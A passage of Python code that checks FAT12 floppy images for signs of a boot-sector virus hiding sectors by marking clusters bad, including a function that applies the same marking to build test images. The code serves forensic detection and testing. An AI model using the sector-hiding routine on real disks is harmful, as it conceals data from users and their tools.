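    fat, media = reserved * bps, img[MEDIA_OFF]     # SCRATCHBUF+200H when reserved=1
    if bps == 0 or fat + 3 > len(img):
        return False, "image truncated before first FAT"
    if img[fat] != media:
        return False, "FAT ID %02X differs from media descriptor %02X" % (img[fat], media)
    if img[fat + 1:fat + 3] != b"\xFF\xFF":
        return False, "FAT bytes 1-2 are not FF FF"
    return True, "FAT header consistent with boot sector"


def bad_cluster_runs(img):
    """(first_cluster, length) runs marked bad in FAT copy 1. On media that was
    never surface-scanned, a contiguous run is the footprint FIND_FREE plus
    MARK_CLUST_BAD leave when sectors are hidden from the file system."""
    bps, spc, reserved, fats, root, total, _, fat_secs = struct.unpack_from(BPB_FMT, img, BPS_OFF)
    fat = img[reserved * bps:(reserved + fat_secs) * bps]
    max_clust = (total - reserved - fats * fat_secs - root * 32 // bps) // spc + 1
    runs, start = [], None
    for n in range(2, max_clust + 2):               # one past the end flushes a trailing run
        bad = n <= max_clust and fat12_entry(fat, n) == BAD_CLUSTER
        if bad and start is None:
            start = n
        elif not bad and start is not None:
            runs.append((start, n - start))
            start = None
    return runs


def mark_clusters_bad(img, first, count):
    """Constructed mutation mirroring MARK_CLUST_BAD: flag a cluster run bad in every FAT copy."""
    bps, _, reserved, fats, _, _, _, fat_secs = struct.unpack_from(BPB_FMT, img, BPS_OFF)
    out = bytearray(img)
    for copy in range(fats):
        for n in range(first, first + count):
            off = (reserved + copy * fat_secs) * bps + n + n // 2
            word = out[off] | (out[off + 1] << 8)
            word = (word & 0x000F) | (BAD_CLUSTER << 4) if n & 1 else (word & 0xF000) | BAD_CLUSTER
            out[off], out[off + 1] = word & 0xFF, word >> 8
    return out
```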

Posted: 14/08/2014, 18:22
